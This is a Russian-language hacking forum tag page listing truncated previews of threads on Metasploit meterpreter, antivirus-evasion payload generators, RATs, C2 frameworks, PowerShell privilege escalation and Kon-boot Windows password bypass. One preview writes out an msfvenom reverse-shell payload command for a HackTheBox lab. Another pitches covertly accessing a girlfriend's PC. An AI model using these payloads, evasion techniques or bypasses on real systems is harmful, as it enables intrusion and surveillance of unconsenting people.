windows hack

  1. S

    проблема с metasploit exploit/multi/handler

    Доброго времени суток, форумчане. Я столкнулся с проблемой, при пинтесте машины Love на платформе HackTheBox. Суть в том, что мне нужно получить удаленный доступ, через полезную нагрузку и metasploit. Вот как я это делал: msfvenom -p windows/meterpreter/reverse_tcp lport=1234 lhost=[myip] -f exe...
  2. gushmazuko

    Статья Meterpreter снова в деле: 100% FUD with Metasploit 5

    You must be registered for see element. Введение Доброго времени суток друзья! Рад снова вас видеть! Написать эту статью я намеревался еще до официального релиза You must be registered for see element., но вечно не хватающее время и некоторые другие обстоятельства не позволили этому сбыться...
  3. penguinz

    Soft [Kon-boot] Обход пароля Windows

    Забыли пароль от винды? Нужно получить доступ к пк девушки? Хотите вскрывать пк одним щелчком? Тогда этот софт для вас. Хочу представить вам прекраснейшую программу которая не раз меня выручала. И имя ей Kon-boot. Представляет она из себя загрузочный диск\флешку\дискету который отключает...
  4. Vander

    Статья Koadic - Command & Control

    Всем привет! Этой статье хочу рассмотреть достаточно полезный инструмент, для проведения тестов на проникновение, в частности, это постэкплуатационная утилита, ниже подробнее. You must be registered for see element. Koadic, или COM Command & Control, представляет собой постэкплуатационный...
  5. <~DarkNode~>

    Статья PowerShell для хакера ( часть X ) Повышения привилегий . [скрипт Sherlock.ps1]

    You must be registered for see element. Приведствую Вас коллеги)) Продолжаем развивать нашу тему You must be registered for see element. и сегодня мы с вами друзья остановимся на очередном этапе тестирования на проникновения , который принято в народе называть "Повышение привилегий" [Privilege...
  6. Vander

    Статья Обзор AhMyth для Android

    Приветствую! Сегодня мы рассмотрим очередной RAT для Android железяк – AnMyth. You must be registered for see element. На мой взгляд, это довольно успешная реализация RAT, так как не требует от оператора каких либо специальных знаний. Он доступен для разных платформ с их списком, можно...
  7. Vander

    Статья Meterpreter сессия. SMB протокол

    Привет, всем! В этой статье я покажу способы получения активной сессии meterpreter, используя SMB протокол. You must be registered for see element. В качестве уязвимой машины мною был выбран Windows Server 2008, а в качестве атакующей системы Kali Linux 2016.2. Все, что нам необходимо для...
  8. Vander

    Статья AVMod2 - Undetectable payload creator

    Приветствую! В этой теме я хочу показать довольно занятную программу под Windows, для генерации полезных нагрузок, которые по утверждению автора проекта, не определяются антивирусами. Причем не просто антивирусами, а современными, даже Windows защитниками. В общем, знакомимся - AVMOD2 –...
  9. <~DarkNode~>

    Статья PowerShell для хакера (часть IV) [Web Delivery] - доставка полезной нагрузки через Web

    Часть 4 You must be registered for see element. You must be registered for see element. You must be registered for see element. You must be registered for see element. Сегодня подготовительная статья на тему возможности PowerShell с точки зрение ИБ, на которою я еще буду ссылаться в...
  10. <~DarkNode~>

    Статья [SharpMeter] - Генератор полезных нагрузок C-sharp

    You must be registered for see element. И снова здравствуйте друзья) Коротенький пост,посмотрим сегодня функционал программы You must be registered for see element. которая позволяет нам создавать полезные нагрузки на языке C#. Написанная на питоне. Все тривиально просто. И так качнули с...
  11. Vander

    Взлом Windows PC - Cypher

    Приветствую! В этой теме я продемонстрирую взлом удаленного хоста с помощью программы Cypher. Она позволит нам добавить полезную нагрузку в исполняемый файл (программу, игру, и т.д) не нарушая его целостности. You must be registered for see element. В качестве атакующей системы будет...
  12. <~DarkNode~>

    PowerShell для хакера (часть I )

    Часть 1 You must be registered for see element. You must be registered for see element. Приветствую Вас колеги. Как Вы уже поняли речь пойдет о знакомствах с базовыми возможностями PowerShell и области применения хакерских техних. И начнем мы пожалуй сегодня с использования скриптов PowerSploit...
  13. <~DarkNode~>

    Статья Знакомство с PowerShell Empire Framework

    И так привет колеги. Сегодня я хотел бы немного Вас ознакомить с прекрасным ,по моему скромному мнению, продуктом PowerShell Empire Framework. PowerShell Empire Framework - это агент для пост эксплуатации windows систем,написанный полностью на павершеле (серверная часть на питона а клиентская...
  14. <~DarkNode~>

    Статья Обход антивируса с помощью ctypes (python)

    Привет колеги. Сегодня покажу очень простенький пример обхода антивируса с помощью библиотеки ctypes в языке программирования python. Суть обхода в том эта библиотека дает нам возможность выполнять код C|C++ в питоновском скрипте. И мы смело сможем запустить шеллкод метасплоита в оперативной...
  15. <~DarkNode~>

    Статья Быстрый способ получить meterpreter

    Привет колеги. ) Сегодня речь пойдет непосредственно о пост эксплуатации скомпрометированной системы (когда у нас есть командная строка удаленной windows машины от windows 7) и нам нужно расширить функционал своих возможностей с помощью метерпретер сессии метаслоита. Для этого нам отлично...
  16. <~DarkNode~>

    PUPY Remote Administration Tool (RAT)

    Сегодня посмотрим ,на мой взгляд , довольно таки не плохой мультиплатформенный RAT на питоне c очень большим функционалом. Pupy может использовать различные протоколы шифрования для комуникации с жертвой (SSL,HTTP,RSA,obfs3,scramblesuit), мигрировать в процессы (reflective injection)...